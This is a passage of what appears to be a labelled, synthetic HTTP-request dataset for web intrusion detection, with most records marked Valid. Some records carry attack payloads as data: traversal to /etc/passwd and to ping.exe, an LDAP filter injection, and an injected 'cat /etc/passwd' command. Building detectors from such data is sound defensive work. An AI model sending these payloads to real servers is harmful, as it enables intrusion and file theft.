Expect: Pdooxti=q8vaaeat;es4etyb=clerresw
From: 3otibe7a@MlsoOs8in.gov
If-Modified-Since: Sat, 14 Oct 06 01:04:58 GMT
If-Unmodified-Since: Sat, 09 Jun 07 10:10:26 CET
If-Match: *
If-None-Match: *
If-Range: "V4aI3jom3tcuAsd2p"
Max-Forwards: 39
MIME-Version: 2.0
Pragma: id1nsm='ste'
Proxy-Authorization: Basic aGVlZW9pOnJmT2h1
Authorization: NTLM bWk5ODZpZGVub2Q5dHF0bjlpYXNvbXlrcmV0ZW82d01hdDhvMHM=
Range: 911-8
Referer: /aelsvnmh.swf
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/9.9 (Machintosh; U; PPC 2.1; aY-or; rv:1.3.0) Gecko/83874410
UA-CPU: Sparc
UA-Disp: 2539,8756,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 929x150
Via: utw/6.8 www.ea6mt.shtml:4586
Transfer-Encoding: assi; tliS=9vceo
Upgrade: yttNQh/3.9, yfpi4i/1.8, lhrs/6.3, setd/4.5, Eye/5.3
Warning: 122 www.yssacdsa.gif "Acidea" "Thu, 21 Jan 10 17:16:57 CET"
X-Forwarded-For: 38.254.21.15
X-Serial-Number: 0883782422223319
----: ---------------
~~~~~: ~~~~~~~~~~

null

End - Id: 27069
Start - Id: 14292
class: Valid
GET /5rgztjdxnelitAtpeEh/poc0ssdxtaufte/dV6mRySvghfULzl/nYCpxoVBYXYsmts/ro_JIShTweC/t@YmTD-ygdjg95LJsvIc.php?noNrRhl=homeOa&8dkoneoiai=nilFlejsH&nGaeibtlpt3c=mv5HNHRshy&ua=udr%40e&stsRw4oc4us7kn2=eeslttlocationM%7Eefso12s%25&mUMgc=0BcaIoMufIw&FD2jR2boP4g=snSyhsi%3Aevshb&I8nCselectdiv=i2hikhnservices2jawi HTTP/1.1
Host: www.h3Ahugb.be
Connection: close
Accept: image/gif, text/*;q=0.8
Accept-Charset: *;q=0.3
Accept-Encoding: deflate, compress, identity;q=0.1, gzip
Accept-Language: *;q=0.9
Cache-Control: max-stale
Client-ip: 12.204.42.238
Cookie: sThoo8liw=230;OoYiRNkG3=heodroddoidifT;iB1c=340478;qzFcF=mrwkfuettw;m0hsotda=92735834;ijedlh3ugT=bit%Ms8nu
Cookie2: $Version="9"
Date: Wed, 13 Jun 07 03:24:18 CET
ETag: "3gy0c8QKT8WDmqbWApH_"
Expect: ya6mphne=miwliiHh
From: 5Urtoesa@acesm4hrat.de
If-Modified-Since: Tue, 27 Oct 09 21:58:00 GMT
If-Unmodified-Since: Tue, 20 Jul 04 22:52:17 CET
If-Match: "8R9EvCJ@4Rr3Vx6y"
If-None-Match: "xN0TfuDDSqE2UgF1a"
If-Range: Sun, 25 Jan 04 19:35:46 UTC
Max-Forwards: 71
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic eXJuYjZlc0U6aHRBbmVv
Authorization: Basic YWJudHRlcnI6Y2hIRmhhYQ==
Range: 921-,-3
Referer: http://uoirXo.de/iinan9e.tar
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: toemadan (rGQFWt; oGD6roB1h1; i2z4lSw1; aUErzPm; xbizOxb)
UA-CPU: MIPS
UA-Disp: 6371,9716,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2883x951
Via: FTP/9.4 0.240.215.87, 4.1 160.137.233.89
Transfer-Encoding: deflate
Upgrade: tut/3.1, tnmcy/2.5, 9Pn5n/5.5, wtte/0.4, sWn/2.2
Warning: 953 183.109.137.63 "rnlaarimmgE4" 
X-Forwarded-For: 152.150.192.212
X-Serial-Number: 731610342681835186
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14292
Start - Id: 44019
class: OsCommanding
GET /cgi-bin/../../../../../../../WINNT/system32/ping.exe 127.0.0.1? HTTP/1.0
Host: www.Cenrj.fr
Connection: close
Accept: application/*;q=0.3, image/*, application/*;q=0.4
Accept-Charset: macintosh
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 78.141.142.69
Cookie: sllodeh7hDsg=t_R-;ereSabreSo4s7NE=nia'Chtpass?ohttps(s;eb1loRurt=g\e;n25grdOorfn=o oo\gg9oIn3alunion;eeO2Wtejs4yOqna=hqR
Cookie2: $Version="698"
Date: Tue, 12 Apr 05 24:33:11 CET
ETag: "afS5RErKT8MdXnD1pWsB"
Expect: 100-continue
From: 44fa@mshrPyo.gov
If-Modified-Since: Tue, 03 Oct 06 01:18:37 UTC
If-Unmodified-Since: Sat, 24 Oct 09 15:50:48 GMT
If-Match: "k3OU0kBy1dz-tyR@"
If-None-Match: "65GUz-dRH2ZQUeIbRsT1"
If-Range: "pIOhWw@_Wr1M5qY"
Max-Forwards: 936
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM aXNEZnNoaXNvYTBkZjFwdG5hc25xY2dBdGN0dGhzNE5ldWluZmxwTw==
Authorization: rpirso 5hnrkEa=t0ebst
Range: 67-764741,470518-20,3-202913
Referer: http://www.rsuM5ee.org/tehhb/0sa20/iAet/sUttfe/4eeufou.doc
TE: gzip;q=0.4,chunked;q=0.9,gzip
Trailer: Host
User-Agent: zZnig (m@B.QbwM; dLlEFR9RF; dRcGXWucQ)
UA-CPU: PowerPC
UA-Disp: 675,1960,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5667x180
Via: FTP/3.6 www.Ofot.js
Transfer-Encoding: identity
Upgrade: t8se4/9.5
Warning: 912 248.158.243.227:1807 "eareZo" 
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 204643043550
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44019
Start - Id: 34341
class: Valid
POST /kcLHE/WfA/Rseiiosiaqz/gmtanraept2smrq2fSot/fkUvA2b/epbRjklium/eval.vKalftp9dvj..html? HTTP/1.1
Content-Length: 128
Content-Language: ulbh8,c
Content-Encoding: deflate
Content-Location: /hsnUmo.wmn
Content-MD5: aWJJVGF0ZWVlVW90YzJvdw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 27 Aug 05 14:44:33 CET
Last-Modified: Wed, 13 Apr 05 02:25:54 CET
Host: www.gsMgtd.org
Connection: keep-alive
Accept: image/*, video/quicktime;q=0.6, video/quicktime;q=0.3
Accept-Charset: x-mac-hebrew;q=0.2, iso-8859-1
Accept-Encoding: gzip, compress, deflate, compress;q=0.5, identity;q=0.6
Accept-Language: 6e-e9
Cache-Control: min-fresh=1599
Client-ip: 166.169.59.188
Cookie: faz=0;dlsrehjeads=regedusOohdm6;ac5mf=627404;j@SN8s73_LM=3;stiah=eee
Cookie2: $Version="08"
Date: Tue, 09 Jan 07 07:49:43 GMT
ETag: "Jhi0.WHrMahIITB"
Expect: 100-continue
From: 8Tmtnybi@toleu.gov
If-Modified-Since: Sun, 17 Sep 06 17:24:03 CET
If-Unmodified-Since: Tue, 30 Aug 05 05:24:11 CET
If-Match: *
If-None-Match: "bGvMjdQJA7WH8_jir"
If-Range: Tue, 09 Feb 10 08:51:01 GMT
Max-Forwards: 082
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: oestsu 7adOioc=p8h4eI5
Authorization: ets4 wipeio6b=iluiemdx
Range: -17313
Referer: http://www.cc4St.uk/xhrb/tizs/bkahsdi2/hoSty.pl
TE: trailers,trailers
Trailer: Authorization
User-Agent: Ubchre (e@g4fA1)
UA-CPU: Sparc
UA-Disp: 3186,9762,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9714x0556
Via: FTP/3.9 54.202.195.60, 1.4 154.194.246.44
Transfer-Encoding: gzip
Upgrade: rdr/6.4, 3nxf/4.2, 62a3t/9.7, gmOIe/2.2, sz3/4.6
Warning: 784 www.qelosv.tiff "satlme3dro" 
X-Forwarded-For: 143.200.9.7
X-Serial-Number: 46710
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

AMqfke4iy=3&8itetbtmr=12106007&t1hgttan0=Uahuoesdri4t&kQ0bpluC=903402&8htthOdd6id=2r1Bjiahp&Xrsitt=009256&huoctasru=$eguecs2m6

End - Id: 34341
Start - Id: 27535
class: Valid
GET /c1W6c/4x-2SnN-MSM/ue5Io-Z2eGx/tRLx/ejRVj5fj/mstyle_/rO/7-ZvIst/LTahaaaeu/tPEIikN9X.htm? HTTP/1.1
Host: 47.141.5.99
Connection: keep-alive
Accept: application/zip, video/quicktime;q=0.9
Accept-Charset: *
Accept-Encoding: compress;q=0.6, compress, compress;q=0.1, gzip
Accept-Language: *;q=0.7
Cache-Control: max-age=281
Client-ip: 13.3.253.56
Cookie: e6=62 otoWwel;tsch1os5ortI3=De ansmesAh;uueNiadzrae=hcopyrns;7NEn=)[bopsi'EeL6ucmd2h
Cookie2: $Version="154"
Date: Sat, 30 Sep 06 20:28:50 GMT
ETag: "azKNpm9J3e5h8jF"
Expect: d4e28saC
From: ieeycl@guH1br.uk
If-Modified-Since: Thu, 30 Apr 09 07:35:43 GMT
If-Unmodified-Since: Fri, 13 May 05 18:27:40 UTC
If-Match: "5lJQUcY6mWcu9Ll6"
If-None-Match: "3X8N.bsJe@ecT@-RWl"
If-Range: Fri, 10 Apr 09 11:14:08 GMT
Max-Forwards: 9
MIME-Version: 3.1
Pragma: Se='w4Jldiu'
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic MEhsNjphdG5oYQ==
Range: -46102,418194-41076
Referer: /H5ity/geGrreh/Coxej5uz/Inutwo4t.cgi
TE: trailers,gzip;q=0.1
Trailer: Max-Forwards
User-Agent: eidht (2j@4inYv-; bE.aW6; n2Te6aHv; x_GhkBIc; fE91BCu)
UA-CPU: PowerPC
UA-Disp: 883,733,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 412x989
Via: 3.3 27.67.167.86:9, HTTP/0.3 www.atyjft.css, asieye/0.3 171.58.108.232
Transfer-Encoding: gzip
Upgrade: Npnao/5.5, 7inei/1.4, 1fe/9.6
Warning: 807 www.tHT4nsBw.tiff "eatatio9t9Iq3" 
X-Forwarded-For: 224.28.160.220
X-Serial-Number: 03769
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27535
Start - Id: 15387
class: Valid
GET /FK/r3oes/nGW5Qb9yaZB_Y/lsgTbiymorfbfSt.cfm? HTTP/1.1
Host: 159.113.206.253:80
Connection: e1teix
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 32.88.148.234
Cookie: CqtsnwRUl=7469331616;UTA.ji=0942;s.Gg4=lEdei;rctnsdls=15154
Cookie2: $Version="5"
Date: Wed, 04 Apr 07 15:03:10 GMT
ETag: W/"d@.lhoUPWXbNxK2x06H"
Expect: taS04eor=niqoa2A
From: geinl@l3cifnrd43.fr
If-Modified-Since: Sat, 05 Jul 08 16:02:12 CET
If-Unmodified-Since: Tue, 31 Jul 07 09:02:03 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 75
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: l7kr5 aism8h=ekiama5a
Authorization: Digest response="4fee8dA8B1AAdBaceba7687A41A1FaD6"
Range: 96924-,-3,41-800
Referer: http://www.mruuea.fr/otltoad/dae3eih/ltzear4.pdf
TE: gzip,deflate
Trailer: Connection
User-Agent: Mozilla/3.0 (compatible; MSIE 2.4; Open BSD i386; rhaa; ba48dndoa)
UA-CPU: x86
UA-Disp: 8387,983,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 5103x7782
Via: aoqRt/8.1 www.ireer.jpeg
Transfer-Encoding: deflate
Upgrade: ajwlas/3.1, qwr/3.1, 489/9.8, uqmyew/2.2
Warning: 532 159.244.10.133 "TerrilhnkEteealty" 
X-Forwarded-For: 76.40.16.131
X-Serial-Number: 7835814731
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15387
Start - Id: 17599
class: Valid
GET /bxUb/Px2/hmrhic/eiMtlhOtiznxnpUist/Kn9/IOusrj202TD7/Cn/bQi5S7/3iwshd45Sap/systemexeciP8F/agqKmne1CqJcPk.h9.css?NbphNtenbFry=eAbRysoItsbate&aie4eExt=6stg14sdl8A&enebwerIucxrii2=e%260e6h&b@q7oru-=pz9iokh&Vbetweent1=ittaRnmseu7&d7s9e=urwindow.openul+N%28having&5cEt0jei0p=uT&moaNb=tUf.Fwq&2ncrjsouaE64ek=e+npall&rawt=2426&pdhaurhe=oO6&erecuTdsve=et67iiho2jieVnhy&yysqoeti5neNak=t4Icopydprocessing-instructionnEwindow.opentl HTTP/1.0
Host: 2.247.15.170
Connection: keep-alive
Accept: */*
Accept-Charset: isiri-3342
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 241.118.249.236
Cookie: traabist4e=mM9nEaqA;UamMfNJl=509;te7m=neAereux3&fea2t;cvSD9pautoexecHRtd=83057530
Cookie2: $Version="35"
Date: Thu, 08 Dec 05 13:31:51 UTC
ETag: "Q7Vw7fuluBJJcwQE42Qj"
Expect: 5ssl
From: x3Anoo0o@wRaou4.biz
If-Modified-Since: Mon, 07 Jun 04 07:51:54 GMT
If-Unmodified-Since: Fri, 15 Oct 04 24:14:41 CET
If-Match: "86YreJXyLdlYc-q.aK"
If-None-Match: *
If-Range: Mon, 18 Oct 04 18:29:16 GMT
Max-Forwards: 7841
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: NTLM aWltYWZ2cmlpcmljZm1haTJuNjF0OW5zb2VlaWVlbmFkdnNvSG5uRGls
Authorization: shdae saAeoht=lripitia
Range: 65473-
Referer: /dnTst.mdb
TE: trailers
Trailer: Authorization
User-Agent: tntpvrtd/1.7
UA-CPU: 68000
UA-Disp: 611,8955,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 519x8664
Via: 9.7 196.46.153.151, HTTP/4.4 20.171.84.86, 9.2 219.197.54.197
Transfer-Encoding: identity
Upgrade: shme/8.6
Warning: 712 223.93.147.43 "mgu5s9ciwimaaiteyot" 
X-Forwarded-For: 200.24.82.209
X-Serial-Number: 607664307
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17599
Start - Id: 32390
class: Valid
GET /Zy/n0wXGR5G2/idseeacd9tEeq/tRWbmHWFT9jb.asmx?openSL@Rr=0l.&XnkEWBhtacces=9984&ii64pena=0185&epod=iesse4&lretruosh7=r+Re9&hX_a1dwd=%26t&5ukih=homef&9ftdeyo8baneo=4631 HTTP/1.0
Host: www.caied.be
Connection: close
Accept: video/*;q=0.9, image/*, audio/basic
Accept-Charset: *
Accept-Encoding: 
Accept-Language: nesf2c-shttseA;q=0.2, enn-c, We-laejeo4;q=0.2, oon8nstY-ahs79Tjb;q=0.0
Cache-Control: no-store
Client-ip: 42.88.197.200
Cookie: ejE=sN1dv;ti=e25@W9yoU7;ntoTcErcevtKsie=oyeole9swlseroo;hMrbeyiaxOei=hlaLtainihoince;nydahrshleriho9=21300290;ohHqb4=c0t6oOEeg
Cookie2: $Version="59"
Date: Mon, 19 Jun 06 13:45:28 CET
ETag: W/"6oB9mofqMr5DqiT"
Expect: 100-continue
From: itad@eosuny.org
If-Modified-Since: Tue, 27 Jun 06 13:16:42 GMT
If-Unmodified-Since: Fri, 25 Mar 05 24:53:32 GMT
If-Match: *
If-None-Match: "qY@8zrWe0y@EOQVC"
If-Range: Sun, 18 Mar 07 13:50:32 GMT
Max-Forwards: 8
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: NTLM U2p0M29sOW5uaURuckZnaVQ3eXJ1bGVibzFidTJ0Njc=
Authorization: Digest qop=auth-int
Range: 36-,82952-6516,-8189
Referer: http://www.igd9gtsw.cz/48auttrl/rinvi/lde1lrs.txt
TE: gzip;q=0.8
Trailer: Upgrade
User-Agent: netna (iY-YilDK; uKwR6j8Ulp; tqu2OIPF; lJQlr5; t-BB-3O.X)
UA-Disp: 281,7423,8
UA-OS: Windows NT
UA-Color: color8
Via: 9.8 www.ste1.jpeg
Transfer-Encoding: deflate
Upgrade: ddG/8.0, tra/2.3
Warning: 620 www.jgtesooe.tiff "ezqhi" 
X-Forwarded-For: 130.13.184.238
X-Serial-Number: 2700091210
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32390
Start - Id: 46212
class: PathTransversal
GET /vnEeowtriDeHo/enqrbw13_22T/opcr/pr4FL20/tg.msf?tdiioubeqx=paafeb&uexj=Cnhuh3rrslsceioa10&npIh=twp-sp&FDD.241uWBh=nirhn&wshsn5eiRemaan=sifryPvt4&c7no=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&2tliIs=4tycEOTebgaRawo9l&3x4xN8GfgOE=987182251 HTTP/1.1
Host: www.lNteo4m.com
Connection: sertmuO
Accept: image/gif;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Xrrendse-sia;q=0.6, ehiwe-3, aoIsy-tye;q=0.0
Cache-Control: min-fresh=352
Client-ip: 244.185.69.193
Cookie: nSvuayEeloeiobT=4spametame9d gcoh;ktey0anaan=rxE24RapYXUO;rmsts9eai=sstt;ZEQZt=rO@0IK
Cookie2: $Version="52"
Date: Wed, 01 Nov 06 01:16:18 CET
ETag: "lyp56_QbpqgxD-1"
Expect: 100-continue
From: xeibsrh@cIoaz0o30a.fr
If-Modified-Since: Fri, 06 Mar 09 22:45:35 CET
If-Unmodified-Since: Tue, 07 Apr 09 15:26:19 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4507
MIME-Version: 5.5
Pragma: irO='cxcr'
Proxy-Authorization: nuit ePlSnli=Ews6alar
Authorization: Basic aDBlczptaWU5aQ==
Range: 63-8582,2-821656
Referer: /oesteee/zaeioes.bin
TE: chunked,trailers
Trailer: Date
User-Agent: Mozilla/3.1 (Machintosh; U; Mac OS X 1.7; en-ay; rv:3.7.7) Gecko/46639337
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6581x3968
Via: qhh/8.1 23.121.86.177:2189, rnu/1.6 209.151.91.137:296
Transfer-Encoding: compress
Upgrade: ehv8/6.5
Warning: 048 www.olNtt.tiff "8Oh4bg22euilahgn" 
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 79986231728889
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46212
Start - Id: 31431
class: Valid
GET /lO2TUzNY.xc0fY6k/ttetDi8qhNxe/hrEvi/ozyoi9zsn9hAeict/tRTLVcErY8hHb_A3axB3/crrTtu5r/3Eieaoe5injnror44m/sfromDAxladmin-hr/fseoohameildswne/X3aerio3yeeauahR1m/ht3asAe/eh.shtml?6ZW9passwds=obetweens&o8teu=iOidwLifr&en=99782&i9airiwwesh=ueo%7C&3pahdaae=eln&tjeheie=ntimtmttk&Onpptr1twev=gIW_AC&svntpy=178181916&lfcfydlep=103 HTTP/1.0
Host: 69.195.134.134
Connection: keep-alive
Accept: audio/x-wav;q=0.2, audio/*
Accept-Charset: windows-1254;q=0.2, euc-tw;q=0.7, x-mac-turkish, utf-8, windows-1254;q=0.8
Accept-Encoding: 
Accept-Language: ylN-edfxMo3
Cache-Control: no-store
Client-ip: 84.151.240.11
Cookie: 6htn1gehh3c2=876279;ot6souetfoes=78442220;0iunhpsowhd5=s3;-htaccesaccept-DmuN=44058055;3DQQ=0StLEn1huati
Cookie2: $Version="82"
Date: Sat, 01 Oct 05 06:45:18 CET
ETag: W/".7BiS1g@7A@OIIL-E"
Expect: 100-continue
From: vconid@sswn.net
If-Modified-Since: Fri, 13 Feb 04 15:08:18 GMT
If-Unmodified-Since: Sat, 15 Jan 05 11:01:01 CET
If-Match: "jGK0tPW90ZCzSydtr0"
If-None-Match: *
If-Range: Sun, 21 Jan 07 11:42:03 CET
Max-Forwards: 9398
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: NTLM aGRvZDZseWxucWFtZXZhdGFzOWV0a2FtdHlhZWVlYWw1RTc5MW50aXJpdHV1
Authorization: k5ariv 4tiec0c=ns7jo
Range: -77880
Referer: /fmasr3n/trqhNe/rlyotbna.jpeg
TE: gzip,trailers,gzip
Trailer: Via
User-Agent: Mozilla/5.1 (X11; U; SunOS sun4u 4.1; 5t-th; rv:2.7.2) Gecko/20642259
UA-CPU: PowerPC
UA-Disp: 887,1676,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 4140x395
Via: FTP/7.8 www.gamulyIk.png:78, 6.0 70.154.186.58
Transfer-Encoding: compress
Upgrade: eeeim/1.1, elzeEw/5.7
Warning: 570 www.amtnyt.css "5OiaaianduesipSirte" "Sun, 30 Nov 08 08:56:41 UTC"
X-Forwarded-For: 102.76.222.209
X-Serial-Number: 886445544
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31431
Start - Id: 37994
class: LdapInjection
GET /eefAYWOhE84y/teaaeoneok/ed2QcyIkkCTsjAZvx/oiaNineo7/mj/7sjTn-k3Y-/ys7oaEw5ueL/gti1usY.jpeg?inmtnday=v5K1d%40zkhes&iAut6tdn=en%3Cprocessing-instructioni%28%5Dmxfromghah%27cps&ooao=wutnecIesen0aqhnTo&cme=9teoUhteatraelT&e1joptTXil2echildw=%29+++%28%7C++%28++cn%3D*o+++%27brien*+%29%28mail++%3D*o+%27brien*++++%29+++&tsMmlsutstr5roc=94092672&ledi8=vbscript%28 HTTP/1.1
Host: 229.243.166.201:80
Connection: keep-alive
Accept: text/*;q=0.0
Accept-Charset: *;q=0.7
Accept-Encoding: deflate, gzip;q=0.2
Accept-Language: *
Cache-Control: no-store
Client-ip: 115.116.216.130
Cookie: 8uorvoda08toasj=i
Cookie2: $Version="53"
Date: Wed, 03 Aug 05 11:27:27 UTC
ETag: W/"dKKZ-cddyT5zsZX1yuM"
Expect: 100-continue
From: trtssn1@Ndseosl4.gov
If-Modified-Since: Wed, 11 Aug 04 15:04:12 UTC
If-Unmodified-Since: Wed, 06 Feb 08 10:14:52 CET
If-Match: "8aKcEsg1XHUUpGgd"
If-None-Match: *
If-Range: *
Max-Forwards: 2467
MIME-Version: 4.1
Pragma: 5='4o8trk5m'
Proxy-Authorization: Digest opaque="tnharvec"
Authorization: Digest response="dAd5FcB57E0C5AB9ea90BC841f0938cc"
Range: 4893-,-7197
Referer: http://kaudgce.be/sOaosi/eoanI/ltorato/nrmngz.gif
TE: chunked,trailers,trailers
Trailer: TE
User-Agent: e5miseris (da3yQopV; nJ4jNfJM)
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 880x8476
Via: 7.3 www.rOqbhho.jpeg, HTTP/0.3 www.qhtikz.jpeg, FTP/2.1 212.39.138.78
Transfer-Encoding: compress
Upgrade: 9aaia/6.6
Warning: 489 www.2ueh.shtml "ll6uon" "Mon, 01 Aug 05 13:30:03 CET"
X-Forwarded-For: 69.225.134.146
X-Serial-Number: 800649
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37994
Start - Id: 43011
class: OsCommanding
POST /ehiTiexqhhosmoB/uuhRr2nhhaNgssy/eruK_c4/wZuX0NFS30hbx/OVLwstylev9Y6kT/Wzrx1.html? HTTP/1.0
Content-Length: 199
Content-Language: b,eHl,w
Content-Encoding: gzip
Content-Location: http://www.bikso.gov/mKFt/um1eteTE/oopyhn/ccipgnmy.tar
Content-MD5: dHJtZWhTaGhkcjg3YTd1ag==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 25 Jun 06 17:13:25 GMT
Last-Modified: Fri, 29 Apr 05 05:10:09 UTC
Host: www.fnNdzkatj.ch
Connection: iiDIee
Accept: */*
Accept-Charset: windows-1251;q=0.2, windows-1252, iso-10646-ucs-2;q=0.4, x-mac-hebrew
Accept-Encoding: 
Accept-Language: eoeeain-hie, s2ti-va8lu, ZC-i1idr6s, e-ee1;q=0.4, u-esSp6a;q=0.1
Cache-Control: no-transform
Client-ip: 236.0.182.54
Cookie: I2P.aT3=0135233;me=ltlRiv
Cookie2: $Version="62"
Date: Mon, 19 Nov 07 24:27:49 UTC
ETag: "X6SSI8tAMpm@96bN5OZe"
Expect: ltfreq
From: odyrata@nanebCh8fa.gov
If-Modified-Since: Wed, 13 Apr 05 06:46:23 CET
If-Unmodified-Since: Mon, 29 Aug 05 21:03:53 GMT
If-Match: "qGZo@jMcMeCGnSlW0Kx"
If-None-Match: *
If-Range: "gI5FGGrGt_9N7wjZ"
Max-Forwards: 726
Pragma: no-cache
Proxy-Authorization: ydmr uAdph=8otfgj
Authorization: Digest realm
Referer: /tidj/Eva9.bin
TE: chunked;q=0.9,trailers
Trailer: Pragma
User-Agent: Mozilla/9.9 (Machintosh; U; PPC 9.5; tn-be; rv:0.8.8) Gecko/49923215
UA-Pixels: 2695x320
Via: 1.6 148.148.60.141, FTP/0.2 www.tgTi.js
Transfer-Encoding: 1dynle; ehrnen=xcniebg
Upgrade: ciE0iZ/4.0
Warning: 863 www.t8fst5.js:4942 "iaa8uceowT1aeejsueoy" "Mon, 03 Nov 08 04:48:51 UTC"
X-Forwarded-For: 225.212.15.105
----: -------------
~~~~~: ~~~~~~~~~~~~~~

aapg5loug=79712&1qvTstdinV6=%250a+cat++++%250a%2Fetc%2Fpasswd+++%250a&aenrIestn=09705237&imgnodeac12HO=ehuxlNZP&%u1GMgv9YDHh=4540105&vF1p=3054678978&l5ie=document&ywewttdosifs=7&dropC1bin=6&nua=79759

End - Id: 43011
Start - Id: 21458
class: Valid
GET /wQ/6@2zy9.php4? HTTP/1.1
Host: 250.71.55.203:80
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-6
Accept-Encoding: *
Accept-Language: g-Zzt;q=0.6, o-odsexyj, Anfso4e-hwl;q=0.4, dosbli-HirhO, el2ol-smviv
Cache-Control: max-stale
Client-ip: 170.93.99.208
Cookie: Qelaxee5ot=xb1vsxvarf;hbectc=889;astdaErnrl64s=ie:ne-stdin9;oypf=o$dYCexecmhc6O;edj2luUaptta=recans;NNth=?']e
Cookie2: $Version="0"
Date: Fri, 14 Apr 06 04:50:58 CET
ETag: W/"g@T.Lgd__-SLRN0z6@U"
Expect: dteder
From: eaheebse@4eGrkw.uk
If-Modified-Since: Fri, 11 Mar 05 03:33:19 GMT
If-Unmodified-Since: Fri, 24 Mar 06 21:22:55 CET
If-Match: *
If-None-Match: "k75.NQTjSALi3M."
If-Range: "j_A98rYEPRFXA@t"
Max-Forwards: 43
MIME-Version: 7.2
Pragma: acRvxd3='u5'
Proxy-Authorization: Digest qop=auth
Authorization: Digest algorithm=mnen
Range: 21333-1766,-00,-67436
Referer: /2srz.mdb
TE: trailers,trailers,trailers
Trailer: From
User-Agent: Odth9alN (a_qGWZ7tZ; f-l.3fLq; t_kRqiVaq; oQ-xkJ6tU)
UA-CPU: Sparc
UA-Disp: 738,354,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 189x8201
Via: 1.0 165.249.84.114:223, FTP/1.0 www.hEi6r.tiff, FTP/8.9 www.bdbo.gif
Transfer-Encoding: ei41n; nqti=dnmdo1
Upgrade: aE4/5.1, aNco/7.8, nenln/5.7
Warning: 502 www.le6w08da.jpeg "cfeinF" 
X-Forwarded-For: 153.129.48.252
X-Serial-Number: 53165421880572
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21458
Start - Id: 4745
class: Valid
POST /enXw3srwwTjF/reli2rco28ejpRg.shtml? HTTP/1.0
Content-Length: 37
Content-Language: oo,2i,d
Content-Encoding: gzip
Content-Location: http://www.ewti.net/dirag/uves1ire.asp
Content-MD5: cmlvaXI3dHNIaGNlU3k2ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 16 Mar 06 19:32:42 GMT
Last-Modified: Fri, 09 Jul 04 14:30:48 GMT
Host: www.amBj.com
Connection: keep-alive
Accept: application/x-tar
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: 2ax-ysfid9;q=0.1, osOa-melreued;q=0.1, yorn2ona-en
Cache-Control: max-age=1529
Client-ip: 133.157.176.125
Cookie: Waaenr6onrl=th;pBewgetTatf@N=shwsajs;lc=aGFYKv.MfG;remtqiha=a4Lfanjg8pe9lvei
Cookie2: $Version="03"
Date: Mon, 08 Dec 08 15:39:39 GMT
ETag: W/"WPn_1BVIeo3XgPPkj"
Expect: e2gZ
From: oetmfrha@shu54hnaa4.uk
If-Modified-Since: Fri, 22 Dec 06 20:15:38 CET
If-Unmodified-Since: Wed, 26 Nov 08 01:34:19 GMT
If-Match: "h@pNAlWIlBvjehURlzt"
If-None-Match: *
If-Range: Mon, 06 Jul 09 23:30:50 GMT
Max-Forwards: 31
MIME-Version: 6.2
Pragma: d='c'
Proxy-Authorization: Digest opaque="rll9"
Authorization: NTLM aWVtcnpTaTZ0VDVsb3Nwb0VuSW9yTGJzbmw2MmllaWlndDkz
Range: -9054
Referer: /hcplat/enNi3th/ow6tori/ub1gn.msf
